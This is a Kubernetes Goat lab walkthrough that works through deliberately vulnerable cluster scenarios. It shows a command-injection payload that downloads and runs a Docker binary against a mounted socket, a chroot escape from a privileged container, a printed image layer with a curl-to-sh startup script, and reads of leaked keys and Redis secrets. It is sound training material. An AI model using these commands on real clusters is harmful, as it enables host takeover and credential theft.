
Kubernetes Goat: a Kubernetes vulnerability playground

2025-07-27 01:26:30

Sensitive keys in codebases

The site's landing page reads:

Welcome to the build code service. This service is built with containers, a CI/CD pipeline, and a modern toolset (Git, Docker, AWS, etc.).

We are given a web service whose source code has leaked, and the code contains sensitive keys.

A directory brute-forcing tool such as dirsearch confirms that a .git directory is exposed; it can then be dumped with the appropriate tool.

Download the source with git-dumper.

One commit stands out: its message mentions environment variables, which tend to be sensitive.

Check it out:
$ git checkout d7c17ad18c574109cd5c4c648ffe551755b576
Note: checking out 'd7c17ad18c574109cd5c4c648ffe551755b576'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b <new-branch-name>

HEAD is now at d7c17a... Inlcuded custom environmental variables

Compared with the latest tree, there is an extra hidden file, .env, which contains AWS keys:
$ ls -a
.  ..  .env  .git    go.sum  main.go  
$ cat .env
[build-code-aws]
aws_access_key_id = AKIVSHD624H22G1KIDC
aws_secret_access_key = cgGn4+gDgnriogn4g+4ig4bg4g44gg4Dox7c1M
k8s_goat_flag = k8s-goat-51bc782065561b0c99280f62510bcc

Enter the pod:
export POD_NAME=$(kubectl get pods --namespace default -l "app=build-code" -o jsonpath="{.items[0].metadata.name}")
kubectl exec -it $POD_NAME -- sh

Run trufflehog . to analyse the repository:
/app # trufflehog .
~~~~~~~~~~~~~~~~~~~~~
Reason: High Entropy
Date: 2020-11-06 22:9:5
Hash: 7daa5f4cda812faa9c62966ba57ee9047ee6b577
Filepath: .env
Branch: origin/master
Commit: updated the endpoints and routes

@@ -0,0 +1,5 @@
+[build-code-aws]
+aws_access_key_id = AKIVSHD624H22G1KIDC
+aws_secret_access_key = cgGn4+gDgnriogn4g+4ig4bg4g44gg4Dox7c1M
+k8s_goat_flag = k8s-goat-51bc782065561b0c99280f62510bcc
+

~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
Reason: High Entropy
Date: 2020-11-06 22:9:5
Hash: 7daa5f4cda812faa9c62966ba57ee9047ee6b577
Filepath: go.sum
Branch: origin/master
Commit: updated the endpoints and routes

@@ -1,496 +1,25 @@
-cloud.google/go v0.26.0/ h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw=
......
......
......
......
......
......

The tool can be installed via pip:
pip install trufflehog
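trufflehog's "High Entropy" findings above come from a simple heuristic: compute the Shannon entropy of each token in a diff and flag long tokens whose character distribution looks random. A minimal sketch of the idea (function names and thresholds here are my own, not trufflehog's actual API):

```python
import math

def shannon_entropy(s: str) -> float:
    """Bits per character of the string's empirical character distribution."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum((n / len(s)) * math.log2(n / len(s)) for n in counts.values())

def looks_like_secret(token: str, min_len: int = 20, threshold: float = 4.5) -> bool:
    # Long, near-random tokens (keys, tokens) score high; prose scores low.
    return len(token) >= min_len and shannon_entropy(token) > threshold

print(round(shannon_entropy("aaaabbbb"), 2))  # 1.0 (two symbols, equally likely)
print(round(shannon_entropy("abcdefgh"), 2))  # 3.0 (eight distinct symbols)
```

Real secrets drawn from a large alphabet (base64, hex) land near the top of the scale, which is why trufflehog scans each git diff word by word.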

DIND (docker-in-docker) exploitation

This scenario starts with command injection; from there we notice that docker.sock has been mapped into the container.

/var/run/docker.sock is the Unix domain socket that the Docker daemon listens on by default. If it is mapped into a container, we can talk to the Docker daemon from inside the container and run arbitrary Docker commands.

We can exploit this by downloading a static Docker binary. The payload below lists the images on the host:
127.0.0.1;wget https://download.docker.com/linux/static/stable/x86_64/docker-19.03.9.tgz -O /tmp/docker-19.03.9.tgz && tar -xvzf /tmp/docker-19.03.9.tgz -C /tmp/ ;/tmp/docker/docker -H unix:///custom/docker/docker.sock images

A real exploit would pull and run a backdoored image that mounts the host's root directory / at /host inside the container, making it easy to modify host files (e.g. crontab) from the backdoor container and complete the escape.

The directory mapping is also visible in the deployment manifest.

SSRF in the Kubernetes (K8S) cluster

This is an internal API proxy listening on port 5000.

We notice something called metadata-db.

Digging deeper, we find http://metadata-db/latest/secrets/kubernetes-goat

Decode the value:
echo "azhzLWdvYXQtY2E5MGVmODVkYjdhWFlZjAxOThkMDJmYjBkZjljYWI=" | base64 -d
k8s-goat-ca90ef85db7a5aef0198d02fb0df9cab

Container escape to the host system

To support finer-grained privilege requirements, the Linux kernel (since version 2.2) splits superuser privileges into fine-grained units called capabilities. For example, CAP_CHOWN allows arbitrary changes to a file's UID and GID, i.e. running chown. Nearly every superuser privilege has been broken out into its own capability.

Inside docker, capsh --print lists the capabilities:
root@nsfocus:/# capsh --print
Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read+ep
Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
Securebits: 00/0x0/1'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=

Compared with the output on a normal machine, there is essentially no difference: this is root with the full capability set.
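The same information is available without capsh: /proc/&lt;pid&gt;/status exposes the effective set as a hex bitmask in its CapEff field, where bit n corresponds to capability number n. A minimal decoder sketch; the table here covers only the first eight capabilities (the full list lives in linux/capability.h):

```python
# Map capability bit numbers to names (first eight only; a fully
# privileged container like this one has every bit set).
CAP_NAMES = {
    0: "cap_chown", 1: "cap_dac_override", 2: "cap_dac_read_search",
    3: "cap_fowner", 4: "cap_fsetid", 5: "cap_kill",
    6: "cap_setgid", 7: "cap_setuid",
}

def decode_caps(mask: int):
    """Expand a CapEff-style bitmask into capability names."""
    return [name for bit, name in sorted(CAP_NAMES.items()) if mask & (1 << bit)]

# 0xc1 has bits 0, 6 and 7 set:
print(decode_caps(0xC1))  # ['cap_chown', 'cap_setgid', 'cap_setuid']
```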

mount shows a /host-system directory mounted.

df shows it too, though from df alone we cannot be sure it is mounted from the host.

The name suggests a host directory; an ls shows that the host's entire root filesystem has been mapped in:
root@nsfocus:~# ls /host-system/
bin  boot  cdrom  dev  etc  home  lib  lib32  lib64  libx32  lost+found  media  mnt  opt  proc  root  run  sbin  snap  srv  swap.img  sys  tmp  usr  var
root@nsfocus:~#

With chroot we gain execution in the host's filesystem:
root@nsfocus:~# chroot /host-system/ bash
root@nsfocus:/# ls
bin  boot  cdrom  dev  etc  home  lib  lib32  lib64  libx32  lost+found  media  mnt  opt  proc  root  run  sbin  snap  srv  swap.img  sys  tmp  usr  var
root@nsfocus:/# docker ps
CONTAINER ID   IMAGE                                                 COMMAND                  CREATED      STATUS      PORTS     NAMES
f0a9afd6f2b6   madhuakula/k8s-goat-info-app                          "python /app.py"         3 days ago   Up 3 days             k8s_info-app_internal-proxy-deployment-5d99cbbdf7-wqmgr_default_efb4eb97-4aa0-4da2-9a9-a0a5dc762649_0
628fcee2fd49   madhuakula/k8s-goat-internal-api                      "docker-entrypoint.s…"   4 days ago   Up 4 days             k8s_internal-api_internal-proxy-deployment-5d99cbbdf7-wqmgr_default_efb4eb97-4aa0-4da2-9a9-a0a5dc762649_0
df0495417aa4   registry.aliyuncs.com/google_containers/pause:3.4.1   "/pause"                 4 days ago   Up 4 days             k8s_POD_internal-proxy-deployment-5d99cbbdf7-wqmgr_default_efb4eb97-4aa0-4da2-9a9-a0a5dc762649_0
5702cc4cdd60   madhuakula/k8s-goat-system-monitor                    "gotty -w bash"          4 days ago   Up 4 days             k8s_system-monitor_system-monitor-deployment-594c89b48f-97rs9_default_081f809d-8199-44bd-8f86-ac6942dfdc8_0
9c1ca7ec8f1a   madhuakula/k8s-goat-poor-registry                     "/entrypoint.sh regi…"   4 days ago   Up 4 days             k8s_poor-registry_poor-registry-deployment-6746b95974-j9xrw_default_d4820bb-48f0-4ebb-9657-c24d677c7cb_0
c899f8a99d     madhuakula/k8s-goat-home                              "/docker-entrypoint.…"   4 days ago   Up 4 days             k8s_kubernetes-goat-home_kubernetes-goat-home-deployment-757f96b7cd-tq5zh_default_ef99f1cd-b0ff-4d6a-9a2e-644acba79ee_0
4a7f9758778    madhuakula/k8s-goat-hidden-in-layers                  "sh -c 'tail -f /dev…"   4 days ago   Up 4 days             k8s_hidden-in-layers_hidden-in-layers-lbwbn_default_2ab772a-e44-4cae-8ede-beca97d662ab_0
......
......
......
......
......
......

We can also drive the cluster with kubectl (a kubeconfig file has to be specified here):
root@nsfocus:/# kubectl --kubeconfig /etc/kubernetes/ get pods
NAME                                               READY   STATUS      RESTARTS   AGE
batch-check-job-mrd2q                              0/1     Completed   0          4d4h
build-code-deployment-99d5f65db-hxllz              1/1     Running     0          4d4h
health-check-deployment-66c59d7f6f-qf5b7           1/1     Running     0          4d4h
hidden-in-layers-lbwbn                             1/1     Running     0          4d4h
internal-proxy-deployment-5d99cbbdf7-wqmgr         2/2     Running     0          3d2h
kubernetes-goat-home-deployment-757f96b7cd-tq5zh   1/1     Running     0          4d4h
metadata-db-77987b74b-2tqjr                        1/1     Running     0          4d4h
poor-registry-deployment-6746b95974-j9xrw          1/1     Running     0          4d4h
system-monitor-deployment-594c89b48f-97rs9         1/1     Running     0          4d4h
root@nsfocus:/# kubectl --kubeconfig /etc/kubernetes/ get nodes
NAME         STATUS   ROLES                  AGE     VERSION
k8s-master   Ready    control-plane,master   4d20h   v1.21.1
nsfocus      Ready    <none>                 4d20h   v1.21.1

Looking at the deployment YAML, besides the root directory being mounted at /host-system, the securityContext also sets allowPrivilegeEscalation: true and privileged: true. Both are dangerous, comparable to docker's --privileged:
root@k8s-master:~/kubernetes-goat/scenarios/system-monitor# cat deployment.yaml 
apiVersion: v1
kind: Secret
metadata:
  name: goatvault
type: Opaque
data:
  k8sgoatvaultkey: azhzLWdvYXQtY2QyZGEyzIyDU5MWRhMmI0OGVmODM4MjZhOGE2YzM=

---
apiVersion: apps/v1
kind: Deployment
......
......
......
      volumes:
      - name: host-filesystem
        hostPath:
          path: /
      containers:
      - name: system-monitor
        image: madhuakula/k8s-goat-system-monitor
        resources:
          limits:
            memory: "50Mi"
            cpu: "20m"
        securityContext:
          allowPrivilegeEscalation: true
          privileged: true
        ports:
        - containerPort: 8080
        volumeMounts:
        - name: host-filesystem
          mountPath: /host-system
......
......
......

Docker CIS benchmark analysis

CIS, the Center for Internet Security, provides well-defined, unbiased, consensus-based industry best practices through its security benchmarks program, helping organisations assess and improve their security.

Docker Bench for Security is a script that checks dozens of common best practices around deploying Docker containers in production; it is available on GitHub.

First deploy the Docker CIS benchmark container:
kubectl apply -f scenarios/docker-bench-security/deployment.yaml

Enter the container:
kubectl exec -it docker-bench-security-XXXXX -- sh

Running docker-bench-security.sh inside ~/docker-bench-security performs the checks.

Under the hood, scenarios/docker-bench-security/deployment.yaml simply maps a number of host directories into the container so the checks can run.

So we could equally download the script from GitHub and run the checks directly on the host.

Kubernetes CIS benchmark analysis

The previous section was about Docker; this one is about Kubernetes, using kube-bench (also on GitHub).

Two commands deploy it:
kubectl apply -f scenarios/kube-bench-security/node-job.yaml

kubectl apply -f scenarios/kube-bench-security/master-job.yaml

In the YAML, the two jobs run command: ["kube-bench", "node"] and command: ["kube-bench", "master"] respectively.

However, the command in the YAML on GitHub has since changed:
# .yaml
command: ["kube-bench", "run", "--targets", "master"]
# .yaml
command: ["kube-bench", "run", "--targets", "node"]

After applying, a new kube-bench-node job appears:
root@k8s-master:~/kubernetes-goat# kubectl apply -f scenarios/kube-bench-security/node-job.yaml
job.batch/kube-bench-node created
root@k8s-master:~/kubernetes-goat# kubectl get jobs
NAME               COMPLETIONS   DURATION   AGE
batch-check-job    1/1           6s        4d6h
hidden-in-layers   0/1           4d6h       4d6h
kube-bench-node    0/1           14s        14s

However, the pods end up in the Error state:
root@k8s-master:~/kubernetes-goat# kubectl get pods
NAME                                               READY   STATUS      RESTARTS   AGE
batch-check-job-mrd2q                              0/1     Completed   0          4d6h
build-code-deployment-99d5f65db-hxllz              1/1     Running     0          4d6h
docker-bench-security-dvlgz                        1/1     Running     0          61m
health-check-deployment-66c59d7f6f-qf5b7           1/1     Running     0          4d6h
hidden-in-layers-lbwbn                             1/1     Running     0          4d6h
internal-proxy-deployment-5d99cbbdf7-wqmgr         2/2     Running     0          4d1h
kube-bench-node-44mxv                              0/1     Error       0          12m
kube-bench-node-8vf74                              0/1     Error       0          10m
kube-bench-node-lfnmt                              0/1     Error       0          8m10s
kube-bench-node-nmfn8                              0/1     Error       0          10m
kube-bench-node-t67b8                              0/1     Error       0          11m
kube-bench-node-xnlvw                              0/1     Error       0          5m0s
kube-bench-node-zb54v                              0/1     Error       0          9m0s
kubernetes-goat-home-deployment-757f96b7cd-tq5zh   1/1     Running     0          4d6h
metadata-db-77987b74b-2tqjr                        1/1     Running     0          4d6h
poor-registry-deployment-6746b95974-j9xrw          1/1     Running     0          4d6h
system-monitor-deployment-594c89b48f-97rs9         1/1     Running     0          4d6h

After updating the command as on GitHub, delete and re-apply:
root@k8s-master:~/kubernetes-goat# kubectl delete -f ./scenarios/kube-bench-security/node-job.yaml 
job.batch "kube-bench-node" deleted
root@k8s-master:~/kubernetes-goat# kubectl apply -f ./scenarios/kube-bench-security/node-job.yaml 
job.batch/kube-bench-node created

Now it completes, so always use the latest manifests:
root@k8s-master:~/kubernetes-goat# kubectl get pods
NAME                                               READY   STATUS      RESTARTS   AGE
batch-check-job-mrd2q                              0/1     Completed   0          4d6h
build-code-deployment-99d5f65db-hxllz              1/1     Running     0          4d6h
docker-bench-security-dvlgz                        1/1     Running     0          6m
health-check-deployment-66c59d7f6f-qf5b7           1/1     Running     0          4d6h
hidden-in-layers-lbwbn                             1/1     Running     0          4d6h
internal-proxy-deployment-5d99cbbdf7-wqmgr         2/2     Running     0          4d1h
kube-bench-node-8xndd                              0/1     Completed   0          68s
kubernetes-goat-home-deployment-757f96b7cd-tq5zh   1/1     Running     0          4d6h
metadata-db-77987b74b-2tqjr                        1/1     Running     0          4d6h
poor-registry-deployment-6746b95974-j9xrw          1/1     Running     0          4d6h
system-monitor-deployment-594c89b48f-97rs9         1/1     Running     0          4d6h

The audit output can be read with kubectl logs:
kubectl logs -f kube-bench-XXX-xxxxx

Attacking private registry

Requesting /v2/_catalog lists all repositories:
$ curl http://192.168.2.174:1235/v2/_catalog
{"repositories":["madhuakula/k8s-goat-alpine","madhuakula/k8s-goat-users-repo"]}

Fetch the second image's manifest:
$ curl http://192.168.2.174:1235/v2/madhuakula/k8s-goat-users-repo/manifests/latest
{
   "schemaVersion": 1,
   "name": "madhuakula/k8s-goat-users-repo",
   "tag": "latest",
   "architecture": "amd64",
   "fsLayers": [
      {
         "blobSum": "sha256:aed95caeb02ffe68cdd9fd84406680ae9d6cb16422d00e8a7c22955b46d4"
      },
      {
         "blobSum": "sha256:56ef547591f025984eb7642226a99ff4a91fa47417faa4575e48e61bd0"
      },
......
......
......
......
......
......

The manifest's history reveals environment-variable information.
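A schema-v1 manifest like the one above embeds each layer's config as a JSON string under history[i].v1Compatibility, and environment variables leak through its config.Env. A sketch of pulling them out (the sample manifest below and its values are made up):

```python
import json

def leaked_env(manifest_json: str):
    """Collect config.Env entries from a schema-v1 manifest's history."""
    manifest = json.loads(manifest_json)
    env = []
    for entry in manifest.get("history", []):
        # Each history entry is itself a JSON document serialised as a string.
        layer_cfg = json.loads(entry["v1Compatibility"])
        env.extend(layer_cfg.get("config", {}).get("Env") or [])
    return env

# Abbreviated, made-up manifest in the same shape as the registry response:
sample_manifest = json.dumps({
    "schemaVersion": 1,
    "name": "madhuakula/k8s-goat-users-repo",
    "history": [
        {"v1Compatibility": json.dumps(
            {"config": {"Env": ["PATH=/usr/local/bin", "API_TOKEN=hunter2"]}})},
    ],
})

print(leaked_env(sample_manifest))  # ['PATH=/usr/local/bin', 'API_TOKEN=hunter2']
```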

NodePort exposed services

NodePort opens a proxy port for a Service on each cluster node, allowing the Service to be reached from the host network.

This lab is set up locally with no public IP, so there is no EXTERNAL-IP:
$ kubectl get nodes -o wide
NAME         STATUS   ROLES                  AGE     VERSION   INTERNAL-IP     EXTERNAL-IP   OS-IMAGE             KERNEL-VERSION     CONTAINER-RUNTIME
k8s-master   Ready    control-plane,master   4d2h   v1.21.1   192.168.2.174   <none>        Ubuntu 20.04.2 LTS   5.4.0-72-generic   docker://20.10.16
nsfocus      Ready    <none>                 4d2h   v1.21.1   192.168.2.172   <none>        Ubuntu 20.04.2 LTS   5.4.0-72-generic   docker://20.10.16

By default the NodePort range is 30000-32767. Scan it with nmap (using the internal IP here):
$ nmap -T4 -p 30000-32767 192.168.2.172
Starting Nmap 7.80 (  ) at 2022-06-20 18:57 CST
Nmap scan report for 192.168.2.172
Host is up (0.0055s latency).
Not shown: 2767 closed ports
PORT      STATE SERVICE
30003/tcp open  amicon-fpsu-ra
MAC Address: 00:50:56:A2:18:00 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds

Port 30003 is open:
$ curl http://192.168.2.172:30003/
{"info": "Refer to internal http://metadata-db for more information"}
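The sweep can also be scripted without nmap; a minimal TCP connect() scan over the default NodePort range (host and ports here are illustrative):

```python
import socket

def scan_nodeports(host: str, start: int = 30000, end: int = 32767,
                   timeout: float = 0.2):
    """Return the ports in [start, end] that accept a TCP connection."""
    open_ports = []
    for port in range(start, end + 1):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means the connect succeeded
                open_ports.append(port)
    return open_ports

# Scan a small slice; a real sweep would cover the whole 30000-32767 range.
print(scan_nodeports("127.0.0.1", 30000, 30010))
```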

Helm v2 tiller to PwN the cluster [deprecated]

This has been removed from Kubernetes Goat, but it is still worth a look.

Helm is Kubernetes' package manager for deploying and managing applications. Its default configuration and setup are insecure: if an attacker can reach any pod in a namespace without network security policies (NSPs), they can gain full cluster access and take over cluster-admin privileges.

Start the environment:
kubectl run --rm --restart=Never -it --image=madhuakula/k8s-goat-helm-tiller -- bash

By default, Helm v2 ships with a tiller component that holds full cluster-admin RBAC permissions.

This one currently has issues in my setup and could not be practised. The idea: by default kubectl get secrets -n kube-system is denied; with the help of helm and the tiller service we deploy pwnchart, which grants cluster-admin to all default service accounts, after which kubectl get secrets -n kube-system succeeds.

Analysing crypto miner container

We usually pull images from public registries such as Docker Hub; an attacker can upload an image that runs a miner and have unwitting users mine for them.

First list the jobs in the Kubernetes cluster:
$ kubectl get jobs -A
NAMESPACE   NAME               COMPLETIONS   DURATION   AGE
default     batch-check-job    1/1           6s        5d5h
default     hidden-in-layers   0/1           5d5h       5d5h
default     kube-bench-node    1/1           29s        22h

kube-bench-node is the node baseline check from earlier.

Get the job's details:
$ kubectl describe job batch-check-job
Name:           batch-check-job
Namespace:      default
Selector:       controller-uid=2ef5201-70c7-48f1-8df7-919674f2ca7
Labels:         controller-uid=2ef5201-70c7-48f1-8df7-919674f2ca7
                job-name=batch-check-job
Annotations:    <none>
Parallelism:    1
Completions:    1
Start Time:     Thu, 16 Jun 2022 10:5:5 +0800
Completed At:   Thu, 16 Jun 2022 10:54:11 +0800
Duration:       6s
Pods Statuses:  0 Running / 1 Succeeded / 0 Failed
Pod Template:
  Labels:  controller-uid=2ef5201-70c7-48f1-8df7-919674f2ca7
           job-name=batch-check-job
  Containers:
   batch-check:
    Image:        madhuakula/k8s-goat-batch-check
    Port:         <none>
    Host Port:    <none>
    Environment:  <none>
    Mounts:       <none>
  Volumes:        <none>
Events:           <none>

Get the job's pods:
$ kubectl get pods --namespace default -l "job-name=batch-check-job"
NAME                    READY   STATUS      RESTARTS   AGE
batch-check-job-mrd2q   0/1     Completed   0          5d5h

Dump the pod as YAML:
$ kubectl get pod batch-check-job-mrd2q -o yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: "2022-06-16T02:5:5Z"
  generateName: batch-check-job-
  labels:
    controller-uid: 2ef5201-70c7-48f1-8df7-919674f2ca7
    job-name: batch-check-job
  name: batch-check-job-mrd2q
  namespace: default
  ownerReferences:
  - apiVersion: batch/v1
    blockOwnerDeletion: true
    controller: true
    kind: Job
    name: batch-check-job
    uid: 2ef5201-70c7-48f1-8df7-919674f2ca7
  resourceVersion: "72916"
  uid: 27657ad4-4fa9-48d0-bdd8-c1117acd2
spec:
  containers:
  - image: madhuakula/k8s-goat-batch-check
    imagePullPolicy: Always
    name: batch-check
    resources: {}
    terminationMessagePath: /dev/termination-log
    terminationMessagePolicy: File
    volumeMounts:
    - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      name: kube-api-access-pdfwk
      readOnly: true
  dnsPolicy: ClusterFirst
  enableServiceLinks: true
  nodeName: nsfocus
  preemptionPolicy: PreemptLowerPriority
  priority: 0
  restartPolicy: Never
  schedulerName: default-scheduler
  securityContext: {}
  serviceAccount: default
  serviceAccountName: default
  terminationGracePeriodSeconds: 0
  tolerations:
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 300
  - effect: NoExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 300
  volumes:
  - name: kube-api-access-pdfwk
    projected:
      defaultMode: 420
      sources:
      - serviceAccountToken:
          expirationSeconds: 3607
          path: token
      - configMap:
          items:
          - key: 
            path: 
          name: kube-root-
      - downwardAPI:
          items:
          - fieldRef:
              apiVersion: v1
              fieldPath: space
            path: namespace
status:
  conditions:
  - lastProbeTime: null
    lastTransitionTime: "2022-06-16T02:5:5Z"
    reason: PodCompleted
    status: "True"
    type: Initialized
  - lastProbeTime: null
    lastTransitionTime: "2022-06-16T02:5:5Z"
    reason: PodCompleted
    status: "False"
    type: Ready
  - lastProbeTime: null
    lastTransitionTime: "2022-06-16T02:5:5Z"
    reason: PodCompleted
    status: "False"
    type: ContainersReady
  - lastProbeTime: null
    lastTransitionTime: "2022-06-16T02:5:5Z"
    status: "True"
    type: PodScheduled
  containerStatuses:
  - containerID: docker://c724beda2e50f66ce184555a2b62f0f678070ac6d290c9ee7462feb1f
    image: madhuakula/k8s-goat-batch-check:latest
    imageID: docker-pullable://madhuakula/k8s-goat-batch-check@sha256:5be81d47c086a0b74bbcdefa5fba0ebb78c8acbd2c0700546b5ff687658ef
    lastState: {}
    name: batch-check
    ready: false
    restartCount: 0
    started: false
    state:
      terminated:
        containerID: docker://c724beda2e50f66ce184555a2b62f0f678070ac6d290c9ee7462feb1f
        exitCode: 0
        finishedAt: "2022-06-16T02:54:11Z"
        reason: Completed
        startedAt: "2022-06-16T02:54:11Z"
  hostIP: 192.168.2.172
  phase: Succeeded
  podIP: 10.244.1.4
  podIPs:
  - ip: 10.244.1.4
  qosClass: BestEffort
  startTime: "2022-06-16T02:5:5Z"

batch-check-job uses the madhuakula/k8s-goat-batch-check image:
$ kubectl get pod batch-check-job-mrd2q -o yaml | grep image
  - image: madhuakula/k8s-goat-batch-check
    imagePullPolicy: Always
    image: madhuakula/k8s-goat-batch-check:latest
    imageID: docker-pullable://madhuakula/k8s-goat-batch-check@sha256:5be81d47c086a0b74bbcdefa5fba0ebb78c8acbd2c0700546b5ff687658ef

docker history shows the command each image layer ran; --no-trunc keeps the output from being truncated. (Run this on the node: only the node has the image.)
$ docker history --no-trunc madhuakula/k8s-goat-batch-check
IMAGE                                                                     CREATED        CREATED BY                                                                                                                                                                                                                                                                                 SIZE      COMMENT
sha256:cb4bcb572b744686c6854282c58e9ac7f2efc294aae49ce4fab7a275c7   5 weeks ago    CMD ["ps" "auxx"]                                                                                                                                                                                                                                                                          0B        buildkit.dockerfile.v0
<missing>                                                                 5 weeks ago    RUN /bin/sh -c apk add --no-cache htop curl ca-certificates    && echo "curl -sSL  && echo 'id' | sh " > /usr/bin/system-startup     && chmod +x /usr/bin/system-startup     && rm -rf /tmp/* # buildkit   2.96MB    buildkit.dockerfile.v0
<missing>                                                                 5 weeks ago    LABEL MAINTAINER=Madhu Akula INFO=Kubernetes Goat                                                                                                                                                                                                                                          0B        buildkit.dockerfile.v0
<missing>                                                                 2 months ago   /bin/sh -c #(nop)  CMD ["/bin/sh"]                                                                                                                                                                                                                                                         0B        
<missing>                                                                 2 months ago   /bin/sh -c #(nop) ADD file:5d67d25daa14ce1f6cf66e4c7fd4f4b85a759a9d9efbfd9ff852b5b56e4 in /                                                                                                                                                                                           5.57MB

One suspicious command stands out:
/bin/sh -c apk add --no-cache htop curl ca-certificates    && echo "curl -sSL  && echo 'id' | sh " > /usr/bin/system-startup     && chmod +x /usr/bin/system-startup     && rm -rf /tmp/*

Kubernetes namespaces bypass

When resources are deployed and managed in different Kubernetes namespaces, it is tempting to assume they are isolated and cannot reach each other.

By default, however, Kubernetes uses a flat network architecture: any pod/service in the cluster can talk to any other.

By default there are also no network restrictions between namespaces; anything in one namespace can reach services in another.

Start the environment:
kubectl run --rm -it hacker-container --image=madhuakula/hacker-container -- sh

First edit the zmap blacklist (vi /etc/zmap/) and comment out the 10.0.0.0/8 line, otherwise the scan will not run:
zmap -p 6379 10.0.0.0/8 -o 
~ # ifconfig 
eth0      Link encap:Ethernet  HWaddr 76:20:B2:1E:01:E8  
          inet addr:10.244.1.1  Bcast:10.244.1.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1450  Metric:1
          RX packets:258424 errors:0 dropped:0 overruns:0 frame:0
          TX packets:22995250 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:18171895 (17.2 MiB)  TX bytes:1229657656 (1.1 GiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

~ # cat  | grep 10.244
10.244.1.5
~ # redis-cli -h 10.244.1.5
10.244.1.5:6379> KEYS *
1) "SECRETSTUFF"
10.244.1.5:6379> GET SECRETSTUFF
"k8s-goat-a5ae446faafa9d0514bff96ab8a40"

In the real world this is simply unauthenticated Redis access. If the Redis server runs as root, an attacker can write an SSH public key into the root account and then SSH straight into the victim server.
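For the curious, redis-cli is just speaking the plain-text RESP protocol; the KEYS/GET queries above could equally be sent over a raw TCP socket to 10.244.1.5:6379. A sketch of the wire encoding (my own helper, not redis-cli's actual code):

```python
def resp_command(*args: str) -> bytes:
    """Encode a command the way redis-cli sends it: a RESP array of bulk strings."""
    parts = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        data = arg.encode()
        # Each argument: $<byte length>\r\n<bytes>\r\n
        parts.append(b"$" + str(len(data)).encode() + b"\r\n" + data + b"\r\n")
    return b"".join(parts)

print(resp_command("GET", "SECRETSTUFF"))  # b'*2\r\n$3\r\nGET\r\n$11\r\nSECRETSTUFF\r\n'
```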

Gathering environment information

The /proc/self/cgroup file reveals the Docker container ID:
root@nsfocus:/home# cat /proc/self/cgroup  
12:blkio:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
11:pids:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
10:rdma:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
9:devices:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
8:freezer:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
7:perf_event:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
6:cpuset:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
5:hugetlb:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
